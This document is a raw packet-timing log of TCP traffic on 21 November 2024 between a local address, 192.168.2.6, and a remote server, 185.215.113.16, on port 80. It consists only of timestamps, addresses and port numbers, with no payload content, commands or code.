                                                                                                                                                                                                            Nov 21, 2024 15:17:34.605845928 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.607377052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.607491016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.609206915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.609272003 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.609334946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.609411955 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.611150026 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.611252069 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.611449957 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.612952948 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.613019943 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.613064051 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.614698887 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.614767075 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.614816904 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.616581917 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.616725922 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.616787910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.618246078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.618259907 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.618302107 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.620006084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.620171070 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.620518923 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.621778965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.621848106 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.621913910 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.623518944 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.623645067 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.623684883 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.625400066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.625536919 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.625659943 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.627063036 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.627140045 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.627193928 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.628712893 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.628823042 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.628978968 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.630500078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.630588055 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.630697966 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.632117033 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.632174969 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.632438898 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.633831978 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.634076118 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.634110928 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.635719061 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.635746956 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.636082888 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.637155056 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.637248039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.637284994 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.638772964 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.638880014 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.638916969 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.640449047 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.640629053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.640850067 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.642055988 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.642172098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.643673897 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.643763065 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.644056082 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.644509077 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.645236015 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.645288944 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.645340919 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.646858931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.646981955 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.647052050 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.648356915 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.702613115 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.739422083 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.739528894 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.739814997 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.739864111 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.739886999 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.739926100 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.740652084 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.740834951 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.740881920 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.741449118 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.741556883 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.741597891 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.742311001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.742521048 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.742578983 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.743119001 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.743220091 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.743257999 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.743997097 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.744035959 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.744076967 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.744740009 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.744812965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.744921923 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.745596886 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.745666981 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.745759010 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.746345997 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.746475935 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.746520996 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.747158051 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.747235060 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.747941971 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.747961998 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.748064041 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.748104095 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.748745918 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.748857975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.748923063 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.749579906 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.749706984 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.749758959 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.750400066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.750446081 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.750507116 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.751152039 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.751307011 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.751630068 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.752034903 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.752136946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.752177954 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.752712965 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.752824068 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.752862930 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.753511906 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.753629923 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.753978968 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.754268885 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.754388094 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.754429102 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.755038977 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.755156040 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.755203009 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.755850077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.756112099 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.756155014 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.756642103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.756695032 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.757251978 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.757361889 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.757477045 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.757517099 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.758130074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.758244038 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.758462906 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.758887053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.759054899 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.759128094 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.759665012 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.759742975 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.760116100 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.760481119 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.760587931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.760627985 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.761168957 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.761269093 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.761440992 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.761928082 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.762059927 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.762106895 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.762645960 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.762705088 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.762767076 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.763415098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.763552904 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.763621092 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.764167070 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.764280081 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.764322996 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.764926910 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.765053034 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.765152931 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.765665054 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.765768051 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.765816927 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.766369104 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.766418934 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.766485929 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.767105103 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.767268896 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.767659903 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.767841101 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.767990112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.768038034 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.768654108 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.768719912 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.768769979 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.769323111 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.769442081 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.769488096 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.770047903 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.770107985 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.770167112 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.770859003 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.771003962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.771466017 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.771526098 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.771559954 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.771595955 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.772238016 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.772339106 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.772597075 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.772983074 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.773093939 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.773194075 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.773696899 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.773828030 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.773868084 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.774427891 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.774538994 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.774574995 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.775149107 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.775300026 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.775347948 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.775927067 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.776257038 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.776312113 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.776700974 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.776777029 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.776858091 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.777348995 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.777486086 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.778098106 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.778188944 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.778239965 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.778259993 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.778816938 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.778925896 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.779129028 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.779473066 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.827609062 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.949942112 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.950052023 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.950102091 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.950233936 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.950355053 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.950395107 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.950973034 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.951108932 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.951328039 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.951697111 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.951899052 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.951939106 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.952430010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.952547073 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.952682018 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.953147888 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.953269005 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.953304052 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.953886986 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.954016924 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.954623938 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.954665899 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.954731941 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.954771996 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.955339909 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.955463886 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.955708981 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.956062078 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.956198931 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.956768990 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.956809998 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.956876993 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.956916094 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.957528114 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.957592010 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.958261967 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.958302975 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.958398104 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.958435059 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.958975077 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.959100962 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.959146976 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.959721088 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.959826946 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.960119009 CET4977880192.168.2.6185.215.113.16
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.960455894 CET8049778185.215.113.16192.168.2.6
                                                                                                                                                                                                            Nov 21, 2024 15:17:34.960552931 CET8049778185.215.113.16192.168.2.6
